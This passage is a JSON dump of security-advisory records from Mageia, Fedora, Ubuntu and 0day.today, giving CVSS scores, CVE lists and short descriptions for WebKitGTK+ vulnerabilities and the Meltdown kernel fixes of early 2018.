"Updated webkit2 packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157"], "modified": "2018-01-01T01:17:34", "id": "MGASA-2018-0005", "href": "https://advisories.mageia.org/MGASA-2018-0005.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "The webkit2 package has been updated to version 2.18.6, fixing several security 
issues and other bugs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-27T09:19:00", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2018-01-27T09:19:00", "id": "MGASA-2018-0102", "href": "https://advisories.mageia.org/MGASA-2018-0102.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-09T16:52:27", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: webkitgtk4-2.18.4-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2018-01-09T16:52:27", "id": "FEDORA:B0AFE6075EE6", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4RIN3K3F4NWIVHG7VSEDRVHKMAB2UCC2/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-28T02:56:27", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: webkitgtk4-2.18.4-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2017-12-28T02:56:27", "id": "FEDORA:8E50360491B7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XRYO7XC2EWI6UKLYRIYC5MTUC27I36GS/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-28T21:33:51", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: webkitgtk4-2.18.6-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2018-01-28T21:33:51", "id": "FEDORA:F117D6006273", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KWUXL4ATBJKWKT5ABIGAYICHPARJJPHW/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-02T16:58:50", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: webkitgtk4-2.18.6-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2018-02-02T16:58:50", "id": "FEDORA:F21276042F34", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KWKKPQBMNY3CM2C5DPUKJQX5ITUAD4HC/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-01-26T13:11:46", "description": "## Releases\n\n * Ubuntu 17.10 \n * Ubuntu 17.04 \n * Ubuntu 16.04 ESM\n\n## Packages\n\n * webkit2gtk \\- Web content engine library for GTK+\n\nA large number of security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. 
If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of service \nattacks, and arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-03T00:00:00", "type": "ubuntu", "title": "WebKitGTK+ vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2018-01-03T00:00:00", "id": "USN-3514-1", "href": "https://ubuntu.com/security/notices/USN-3514-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T13:11:06", "description": "## Releases\n\n * Ubuntu 17.10 \n * Ubuntu 16.04 ESM\n\n## Packages\n\n * webkit2gtk \\- Web content engine library for GTK+\n\nMultiple security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. 
If a user were tricked into opening a specially \ncrafted website, an attacker could potentially exploit these to cause a \ndenial of service, spoof the user interface, or execute arbitrary code. \n(CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, \nCVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-30T00:00:00", "type": "ubuntu", "title": "WebKitGTK+ vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2018-01-30T00:00:00", "id": "USN-3551-1", "href": "https://ubuntu.com/security/notices/USN-3551-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T13:11:41", "description": "## Releases\n\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * linux-aws \\- Linux kernel for Amazon Web Services (AWS) systems\n * linux-lts-xenial \\- Linux hardware enablement kernel from Xenial for Trusty\n\nUSN-3522-1 fixed vulnerabilities in the Linux kernel for Ubuntu 
16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory. \n(CVE-2017-5754)\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-09T00:00:00", "type": "ubuntu", "title": "Linux (Xenial HWE) vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-09T00:00:00", "id": "USN-3522-2", "href": "https://ubuntu.com/security/notices/USN-3522-2", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:34", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * linux \\- Linux kernel\n\nUSN-3522-1 fixed a vulnerability in the Linux kernel to address \nMeltdown (CVE-2017-5754). 
Unfortunately, that update introduced \na regression where a few systems failed to boot successfully. This \nupdate fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "ubuntu", "title": "Linux kernel regression", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-10T00:00:00", "id": "USN-3522-3", "href": "https://ubuntu.com/security/notices/USN-3522-3", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:31", "description": "## Releases\n\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * linux-lts-xenial \\- Linux hardware enablement kernel from Xenial for Trusty\n\nUSN-3522-2 fixed a vulnerability in the Linux Hardware Enablement \nkernel for Ubuntu 14.04 
LTS to address Meltdown (CVE-2017-5754). \nUnfortunately, that update introduced a regression where a few systems \nfailed to boot successfully. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "ubuntu", "title": "Linux kernel (Xenial HWE) regression", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-10T00:00:00", "id": "USN-3522-4", "href": "https://ubuntu.com/security/notices/USN-3522-4", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:39", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * linux \\- Linux kernel\n * linux-aws \\- Linux kernel for Amazon Web Services (AWS) systems\n * linux-euclid \\- Linux 
kernel for Intel Euclid systems\n * linux-kvm \\- Linux kernel for cloud environments\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-09T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-09T00:00:00", "id": "USN-3522-1", "href": "https://ubuntu.com/security/notices/USN-3522-1", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:39", "description": "## Releases\n\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * linux \\- Linux kernel\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. 
A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-09T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-09T00:00:00", "id": "USN-3524-1", "href": "https://ubuntu.com/security/notices/USN-3524-1", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:34", "description": "## Releases\n\n * Ubuntu 12.04 \n\n## Packages\n\n * linux \\- Linux kernel\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. 
A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-10T00:00:00", "id": "USN-3525-1", "href": "https://ubuntu.com/security/notices/USN-3525-1", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:36", "description": "## Releases\n\n * Ubuntu 12.04 \n\n## Packages\n\n * linux-lts-trusty \\- Linux hardware enablement kernel from Trusty for Precise ESM\n\nUSN-3524-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. 
A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "ubuntu", "title": "Linux kernel (Trusty HWE) vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-10T00:00:00", "id": "USN-3524-2", "href": "https://ubuntu.com/security/notices/USN-3524-2", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "zdt": [{"lastseen": "2018-04-14T17:48:24", "description": "WebKitGTK+ versions 2.18.x suffer from various memory corruption, user interface spoofing, and code execution vulnerabilities.", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "WebKitGTK+ Memory Corruption / Spoofing / Code Execution Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-7165", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-13884", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4089", "CVE-2017-13885"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29634", "href": "https://0day.today/exploit/description/29634", 
"sourceData": "WebKitGTK+ Memory Corruption / Spoofing / Code Execution Vulnerabilities\r\n\r\nAdvisory URL : https://webkitgtk.org/security/WSA-2018-0002.html\r\nCVE identifiers : CVE-2018-4088, CVE-2018-4089, CVE-2018-4096,\r\n CVE-2017-7153, CVE-2017-7160, CVE-2017-7161,\r\n CVE-2017-7165, CVE-2017-13884, CVE-2017-13885.\r\n\r\nSeveral vulnerabilities were discovered in WebKitGTK+.\r\n\r\nCVE-2018-4088\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Jeonghoon Shin of Theori.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2018-4089\r\n Versions affected: WebKitGTK+ before 2.18.4.\r\n Credit to Ivan Fratric of Google Project Zero.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2018-4096\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to OSS-Fuzz.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-7153\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Jerry Decime.\r\n Impact: Visiting a malicious website may lead to user interface\r\n spoofing. Description: Redirect responses to 401 Unauthorized may\r\n allow a malicious website to incorrectly display the lock icon on\r\n mixed content. This issue was addressed through improved URL display\r\n logic.\r\n\r\nCVE-2017-7160\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Richard Zhu (fluorescence) working with Trend Micro's Zero\r\n Day Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. 
